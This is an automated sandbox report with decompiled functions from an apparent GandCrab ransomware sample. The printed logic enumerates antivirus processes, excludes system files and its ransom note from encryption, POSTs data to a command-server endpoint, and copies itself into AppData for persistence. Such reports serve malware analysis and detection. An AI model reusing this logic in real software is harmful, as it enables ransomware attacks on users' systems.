u, xrefs: 00D74D9A
o, xrefs: 00D74D93
l, xrefs: 00D74D81
d, xrefs: 00D74DD2
r, xrefs: 00D74DCB
fabian wosar <3, xrefs: 00D74E95
d, xrefs: 00D74DAF
., xrefs: 00D74DBD
o, xrefs: 00D74DC4
S, xrefs: 00D74DA8
, xrefs: 00D74DA1
r, xrefs: 00D74DE0
s, xrefs: 00D74DB6

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $.$S$d$d$fabian wosar <3$l$n$o$o$r$r$s$s$u
API String ID: 1490407255-783179298
Opcode ID: 16f84d98059a20d178a6d28b8a7da49920a62ab9caf5360be046154ce29f1be1
Instruction ID: a4094a38d02be5a93d7f2357aa7f704c89484f4c5e6f05f6850ffd1852337c5e
Opcode Fuzzy Hash: 16f84d98059a20d178a6d28b8a7da49920a62ab9caf5360be046154ce29f1be1
Instruction Fuzzy Hash: 9631C371A01308ABEB109F94AC49BEEBBB5FF04714F144025E908E62D0EBF149488BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00D77520 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00D77520(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t49;
				WCHAR* _t56;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c;
					_t49 = CreateToolhelp32Snapshot(2, 0);
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						if(Process32FirstW(_t49) != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000);
						CloseHandle(_v20);
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000);
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x00d7753d
0x00d7753f
0x00d7754d
0x00d7754f
0x00d77556
0x00d7755d
0x00d77564
0x00d7756b
0x00d77572
0x00d77579
0x00d77580
0x00d77587
0x00d7758e
0x00d77595
0x00d7759c
0x00d775a3
0x00d775aa
0x00d775b3
0x00d775b5
0x00d775ba
0x00d775e4
0x00d775ea
0x00d775bc
0x00d775c0
0x00d775c6
0x00d775cc
0x00d775d2
0x00d775ef
0x00d775f1
0x00d775f3
0x00d775f6
0x00d775f9
0x00d775fc
0x00d77607
0x00000000
0x00d77610
0x00d77618
0x00d77620
0x00d7762f
0x00d77633
0x00000000
0x00d77635
0x00d77635
0x00d77635
0x00d77697
0x00d77697
0x00d776a6
0x00000000
0x00000000
0x00000000
0x00d776a6
0x00d7763e
0x00d7763f
0x00d77641
0x00d77648
0x00d77665
0x00d7766e
0x00d7764a
0x00d7764a
0x00d77657
0x00d77657
0x00d77670
0x00d7768e
0x00d77691
0x00d77694
0x00000000
0x00d77694
0x00d776b7
0x00d776bb
0x00d776bd
0x00d776c3
0x00d776d0
0x00d776d0
0x00d776c3
0x00d776db
0x00d776db
0x00d776eb
0x00d776f0
0x00d776f6
0x00d776fb
0x00d77705
0x00d77705
0x00d7770f
0x00d775d4
0x00d775dc
0x00000000
0x00d775dc
0x00d775d2

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,746566A0,?,76B5C0B0), ref: 00D7753D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00D775B1
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D775C6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D775DC
Process32FirstW.KERNEL32(00000000,00000000), ref: 00D775FF
lstrcmpiW.KERNEL32(00D807DC,-00000024), ref: 00D77625
Process32NextW.KERNEL32(?,?), ref: 00D7769E
GetLastError.KERNEL32 ref: 00D776A8
lstrlenW.KERNEL32(00000000), ref: 00D776C6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D776EB
CloseHandle.KERNEL32(?), ref: 00D776F0
VirtualFree.KERNEL32(?,?,00008000), ref: 00D77705

Strings

iet, xrefs: 00D77625

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
String ID: iet
API String ID: 2470459410-2308090442
Opcode ID: 5ce68ac3b252bf06c016668ff0e648b8707b7a5286728fe8a4d137235e76971f
Instruction ID: bd5100ac06ec5d7ef0568b522fb5dc12492299be6af1ef9ebfe19d0738777362
Opcode Fuzzy Hash: 5ce68ac3b252bf06c016668ff0e648b8707b7a5286728fe8a4d137235e76971f
Instruction Fuzzy Hash: 77515B72D00218ABCB50AF58DC48B9DBFB4FB44710F248059E908AB394E7B15989CFB4

Uniqueness

Uniqueness Score: -1.00%

Function 00D76240 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00D76240(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x00d76249
0x00d7624c
0x00d76251
0x00d76253
0x00d76256
0x00d76259
0x00d7625a
0x00d76260
0x00d76260
0x00d76263
0x00d76264
0x00d76260
0x00d76274
0x00d76281
0x00d76296
0x00000000
0x00d762e0
0x00d762e6
0x00d762eb
0x00d762f0
0x00d762f0
0x00d76285
0x00d76285
0x00d7628b
0x00d7628b

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,00D76403), ref: 00D7624C
lstrlenW.KERNEL32(00000000), ref: 00D76251
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 00D7627D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 00D76292
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 00D7629E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 00D762AA
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 00D762B6
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 00D762C2
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 00D762CE
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 00D762DA
lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 00D762E6

Strings

boot.ini, xrefs: 00D762BC
ntuser.dat, xrefs: 00D76298
autorun.inf, xrefs: 00D7628C
ntuser.dat.log, xrefs: 00D762C8
bootsect.bak, xrefs: 00D762B0
thumbs.db, xrefs: 00D762D4
GDCB-DECRYPT.txt, xrefs: 00D762E0
iet, xrefs: 00D7626E
iconcache.db, xrefs: 00D762A4
desktop.ini, xrefs: 00D76277

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: iet$GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3694586627
Opcode ID: 64d1b511d9d448a307a1574127b394988d925fa203dca7a86970922838d1a54e
Instruction ID: f0fb42a45048752b72339c9ecffb3072db23eb26b619510393907dbfb0154efe
Opcode Fuzzy Hash: 64d1b511d9d448a307a1574127b394988d925fa203dca7a86970922838d1a54e
Instruction Fuzzy Hash: B511C663645B373A5AE032A9DC05EAF069C8D91B403094311F904E3085FBD1DA0A8ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00D75370 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00D75370(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E00D777F0( &_v36);
				_v24 = E00D74EB0();
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x74656981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0xd7ffd0]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0xd7ffe0]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0xd7fff0]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0xd80000]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0xd80010]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0xd80020]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E00D78B30( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E00D75270( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E00D77A00( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E00D75050(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x74656981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}

0x00d7537b
0x00d7537d
0x00d75384
0x00d75387
0x00d75392
0x00d753a8
0x00d753af
0x00d753c3
0x00d753c7
0x00d753cc
0x00d753d1
0x00d753da
0x00d753da
0x00d753dc
0x00d753e8
0x00d753ee
0x00d753f0
0x00d753f9
0x00d75401
0x00d75409
0x00d7540e
0x00d75416
0x00d7541b
0x00d75423
0x00d75428
0x00d75430
0x00d75435
0x00d7543d
0x00d75442
0x00d75448
0x00d75457
0x00d7545d
0x00d75471
0x00d7547d
0x00d75489
0x00d7548f
0x00d75492
0x00d75499
0x00d7549a
0x00d754a2
0x00d754a7
0x00d754af
0x00d754b0
0x00d754b1
0x00d754ba
0x00d754bb
0x00d754c6
0x00d754cc
0x00d754d1
0x00d754d6
0x00d754e6
0x00d754f6
0x00d754e8
0x00d754e8
0x00d754ed
0x00d754f2
0x00d754f2
0x00d754ed
0x00d754e6
0x00d754d1
0x00d75506
0x00d75512
0x00d7551e
0x00d75520
0x00d75525
0x00d75528
0x00d75528
0x00d75536
0x00d75536
0x00d753d3
0x00d753d8
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00D777F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D779D4
Part of subcall function 00D777F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 00D779ED

Part of subcall function 00D74EB0: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74656980,00000000,00000000), ref: 00D74F22
Part of subcall function 00D74EB0: Sleep.KERNEL32(00002710), ref: 00D74F4C
Part of subcall function 00D74EB0: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00D74F5A
Part of subcall function 00D74EB0: VirtualAlloc.KERNEL32(00000000,00000000), ref: 00D74F6A
Part of subcall function 00D74EB0: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00D74F7E
Part of subcall function 00D74EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D74F8F
Part of subcall function 00D74EB0: wsprintfW.USER32 ref: 00D74FA7
Part of subcall function 00D74EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D74FB8

lstrlenA.KERNEL32(00000000,74656980,00000000,00000000), ref: 00D75395
VirtualAlloc.KERNEL32(00000000,74656981,00003000,00000040), ref: 00D753B5
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 00D753CA
lstrcatA.KERNEL32(00000000,data=), ref: 00D753E8
lstrcatA.KERNEL32(00000000,00D756FE), ref: 00D753EE
lstrlenA.KERNEL32(00000000), ref: 00D75442
_memset.LIBCMT ref: 00D7545D
lstrcpyW.KERNEL32 ref: 00D75471
lstrlenW.KERNEL32(?), ref: 00D75489
lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 00D754A9
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 00D75506
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00D75512
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00D7551E
InternetCloseHandle.WININET(?), ref: 00D75528

Strings

POST, xrefs: 00D7549A
data=, xrefs: 00D753E2
curl.php?token=, xrefs: 00D7546B

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
String ID: POST$curl.php?token=$data=
API String ID: 186108914-1715678351
Opcode ID: 7f01bedf373ddbf31e1ac403dceabd9271fe88423e2bd8e13df0cebdcb7bf4f5
Instruction ID: 2d41b949a47f8f84f5392cb47475afeeed75606a4032918421a762f1cc8412a1
Opcode Fuzzy Hash: 7f01bedf373ddbf31e1ac403dceabd9271fe88423e2bd8e13df0cebdcb7bf4f5
Instruction Fuzzy Hash: 69518772D0031AAADB119BA8DC45FAEBB7CFB48700F104555EA48F6291FFB45644CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D72AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00D72AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E00D77BA0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E00D77C60( &_v20, lstrlenW( &_v20));
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E00D77BA0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E00D72890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E00D72960(_t57, _t75);
					L17:
					ExitThread(0);
				}
			}

0x00d72ad6
0x00d72aea
0x00d72af0
0x00d72af4
0x00d72af6
0x00d72b00
0x00d72b1c
0x00d72b1e
0x00d72b1e
0x00d72b02
0x00d72b02
0x00d72b02
0x00d72b08
0x00d72b10
0x00d72b12
0x00d72b14
0x00d72b14
0x00d72b28
0x00d72b2c
0x00d72b38
0x00d72b3e
0x00d72b43
0x00d72b48
0x00d72b4a
0x00d72b55
0x00d72b62
0x00d72b67
0x00d72b6c
0x00d72b75
0x00d72b89
0x00d72b8e
0x00d72b9c
0x00d72ba2
0x00d72ba5
0x00d72ba7
0x00d72bac
0x00d72bae
0x00d72be4
0x00d72bec
0x00d72bf4
0x00d72bf6
0x00d72bfd
0x00d72c02
0x00d72c05
0x00d72c07
0x00000000
0x00000000
0x00d72c0f
0x00d72c11
0x00d72c16
0x00d72c1d
0x00d72c2c
0x00d72c2c
0x00d72c2c
0x00d72c2e
0x00d72c2e
0x00d72c2f
0x00d72c35
0x00d72c3b
0x00000000
0x00d72c3d
0x00d72c25
0x00d72c2a
0x00000000
0x00000000
0x00000000
0x00d72c2a
0x00d72bb6
0x00d72bb8
0x00d72bbd
0x00d72bc4
0x00d72bd3
0x00d72bd3
0x00d72bd3
0x00d72bd5
0x00d72bd5
0x00000000
0x00d72bd5
0x00d72bcc
0x00d72bd1
0x00000000
0x00000000
0x00000000
0x00d72b4c
0x00d72b4c
0x00d72c40
0x00d72c40
0x00d72c45
0x00d72c47
0x00d72c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00D72AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00D72B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 00D72B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 00D72B7D

Part of subcall function 00D77C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00D77C7D
Part of subcall function 00D77C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00D77CAB
Part of subcall function 00D77C60: GetModuleHandleA.KERNEL32(?), ref: 00D77CFF
Part of subcall function 00D77C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00D77D0D
Part of subcall function 00D77C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00D77D1C
Part of subcall function 00D77C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00D77D65
Part of subcall function 00D77C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D77D73

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 00D72B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 00D72BE4
lstrcatW.KERNEL32(00000000,?), ref: 00D72BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 00D72BF4
wsprintfW.USER32 ref: 00D72C35
ExitThread.KERNEL32 ref: 00D72C47

Strings

P, xrefs: 00D72B55
U, xrefs: 00D72B75
AppData, xrefs: 00D72B97
\Microsoft\, xrefs: 00D72BDE
"%s", xrefs: 00D72C2F
.exe, xrefs: 00D72BEE
I, xrefs: 00D72B6C

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 0f687a992bbeb74090899273297fe97a1018df2495ad30924a886c15ee02c733
Instruction ID: 41a6aa7c96f709ea4bec2650e0e9c9cd21fd55a27a766555aad30622642f0057
Opcode Fuzzy Hash: 0f687a992bbeb74090899273297fe97a1018df2495ad30924a886c15ee02c733
Instruction Fuzzy Hash: A94184712043519FE3049F209C5AF6F7BE9EB84704F048428B95DD6292FA74D948CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 00D77369 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 123
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00D77369(signed int __eax, intOrPtr __edx, void* __esi) {
				signed int _t51;
				signed int _t56;
				void* _t58;
				long _t59;
				void* _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr _t85;
				WCHAR* _t88;
				intOrPtr _t93;
				signed int _t95;
				intOrPtr _t100;
				void* _t102;
				void* _t104;
				void* _t106;

				_t102 = __esi;
				_t93 = __edx;
				_t51 = __eax;
				do {
					 *(_t104 - 0x24) =  *((intOrPtr*)(_t104 + _t51 * 2 - 0x80));
					_t95 = GetDriveTypeW(_t104 - 0x24);
					if(_t95 <= 2 || _t95 == 5) {
						L6:
					} else {
						 *((short*)(_t104 - 0x20)) = 0;
						lstrcatW( *(_t102 + 0x7c), _t104 - 0x24);
						 *((short*)(_t104 - 0x20)) = 0x5c;
						lstrcatW( *(_t102 + 0x7c),  *(_t104 + _t95 * 4 - 0x40));
						lstrcatW( *(_t102 + 0x7c), "_");
						if(GetDiskFreeSpaceW(_t104 - 0x24, _t104 - 0x1c, _t104 - 0x14, _t104 - 0xc, _t104 - 0x10) == 0) {
							lstrcatW( *(_t102 + 0x7c), L"0,");
							goto L6;
						} else {
							 *((intOrPtr*)(_t104 - 8)) = E00D78470( *(_t104 - 0x10), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t85 = _t93;
							_t75 = E00D78470( *(_t104 - 0xc), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t100 =  *((intOrPtr*)(_t104 - 8));
							 *((intOrPtr*)(_t104 - 4)) = _t100 - _t75;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t104 - 8)) = _t85;
							_t77 = lstrlenW( *(_t102 + 0x7c));
							_push(_t85);
							wsprintfW( &(( *(_t102 + 0x7c))[_t77]), L"%I64u/", _t100);
							_t80 = lstrlenW( *(_t102 + 0x7c));
							_push( *((intOrPtr*)(_t104 - 8)));
							wsprintfW( &(( *(_t102 + 0x7c))[_t80]), L"%I64u",  *((intOrPtr*)(_t104 - 4)));
							_t106 = _t106 + 0x20;
							lstrcatW( *(_t102 + 0x7c), ",");
						}
					}
					_t51 =  *(_t104 - 0x18) + 1;
					 *(_t104 - 0x18) = _t51;
				} while (_t51 < 0x1b);
				_t56 = lstrlenW( *(_t102 + 0x7c));
